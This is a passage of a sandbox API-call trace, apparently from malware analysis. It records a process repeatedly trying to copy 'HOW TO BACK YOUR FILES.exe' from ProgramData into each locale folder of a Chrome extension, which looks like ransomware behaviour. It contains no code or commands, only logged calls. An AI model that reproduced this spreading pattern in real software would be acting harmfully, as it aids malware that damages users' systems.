lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835f5d10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4b7c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4b7c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.226] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" [0111.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" [0111.227] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.227] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.227] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.228] GetLastError () returned 0x0 [0111.228] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835ec0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4b7c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4b7c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.228] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" [0111.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" [0111.228] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.228] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.229] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.229] GetLastError () returned 0x0 [0111.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835e4ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4ddde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4ddde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.230] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" [0111.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" [0111.230] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.230] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.231] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.231] GetLastError () returned 0x0 [0111.231] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.231] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835dd670, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d503f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d503f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.232] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" [0111.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" [0111.232] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.232] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.233] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.233] GetLastError () returned 0x0 [0111.233] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835daf60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d503f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d503f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.233] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" [0111.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" [0111.234] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.234] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.234] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.235] GetLastError () returned 0x0 [0111.235] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835cec10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d52a0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d52a0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.235] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" [0111.235] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" [0111.235] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.235] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.236] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.236] GetLastError () returned 0x0 [0111.237] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835c4fd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d550200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d550200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.237] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" [0111.237] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" [0111.237] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.237] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.238] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.238] GetLastError () returned 0x0 [0111.239] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.239] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835c01b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d550200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d550200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.239] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" [0111.239] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" [0111.239] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.239] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.240] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.240] GetLastError () returned 0x0 [0111.240] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 